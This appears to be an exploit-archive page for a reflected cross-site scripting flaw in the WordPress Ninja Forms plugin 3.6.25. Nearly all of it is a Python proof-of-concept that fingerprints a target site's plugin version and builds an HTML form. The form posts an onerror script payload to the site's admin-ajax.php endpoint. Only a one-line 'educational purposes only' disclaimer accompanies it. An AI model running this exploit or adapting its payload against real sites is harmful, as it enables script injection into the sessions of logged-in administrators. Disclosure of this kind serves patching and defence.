Wordpress plugin ninja forms 3.6.25 reflected xss Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-08-04 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress plugin ninja forms 3.6.25 reflected xss is for educational purposes only and if it is used you will do on your own risk!
# HTML template
HTML_TEMPLATE = f"""<!DOCTYPE html>
<!-- Created By Mehran Seifalinia -->
<html>
<head>
<title>{CVE_NAME}</title>
<style>
body {{
font-family: Arial, sans-serif;
background-color: #f7f7f7;
color: #333;
margin: 0;
padding: 0;
}}
header {{
background-color: #4CAF50;
padding: 10px;
text-align: center;
color: white;
font-size: 24px;
}}
.cool-button {{
background-color: #007bff;
color: white;
padding: 10px 20px;
border: none;
cursor: pointer;
font-size: 16px;
border-radius: 4px;
}}
.cool-button:hover {{
background-color: #0056b3;
}}
</style>
</head>
<body>
<header>
Ninja-forms reflected XSS ({CVE_NAME})</br>
Created by Mehran Seifalinia
</header>
<div style="padding: 20px;">
<form action="{url}/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="nf_batch_process" />
<input type="hidden" name="batch_type" value="import_form_template" />
<input type="hidden" name="security" value="e29f2d8dca" />
<input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />
<input type="hidden" name="method_override" value="_respond" />
<input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />
<input type="submit" class="cool-button" value="Click here to Execute XSS" />
</form>
</div>
<div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>
<footer>
<a href="https://github.com/Mehran-Seifalinia">Github</a>
</br>
<a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a
</footer>
</body>
</html>
"""
def exploit():
with open(f"{CVE_NAME}.html", "w") as poc:
poc.write(HTML_TEMPLATE)
print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
sleep(2)
webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")
# Check if the vulnerable version is installed
def check_CVE():
try:
response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")
if response.status_code != 200 or not("Ninja Forms" in response.text):
print("[!] Ninja-forms plugin has not installed on this site.")
return False
else:
version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]
main_version = int(version.split(".")[0])
partial_version = int(version.split(".")[1])
final_version = int(version.split(".")[2])
if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):
print(f"[*] Vulnerable Nonja-forms version {version} detected!")
return True
else:
print(f"[!] Nonja-forms version {version} is not vulnerable!")
return False
except Exception as error:
print(f"[!] Error: {error}")
exit()
# Check syntax of the script
def check_script():
usage = f"""
Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]
OPTIONS:
--exploit: Open a browser and execute the vulnerability.
TARGET:
An URL starts with 'http://' or 'https://'
Examples:
> {argv[0].split("/")[-1]} https://vulnsite.com
> {argv[0].split("/")[-1]} --exploit https://vulnsite.com
"""
try:
if len(argv) < 2 or len(argv) > 3:
print("[!] Syntax error...")
print(usage)
exit()
elif not url.startswith(tuple(["http://", "https://"])):
print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")
exit()
else:
for arg in argv:
if arg == argv[0]:
print("[*]Starting the script >>>")
state = check_CVE()
if state == False:
exit()
elif arg.lower() == "--exploit":
exploit()
elif arg == url:
continue
else:
print(f"[!] What the heck is '{arg}' in the command?")
except Exception as error:
print(f"[!] Error: {error}")
exit()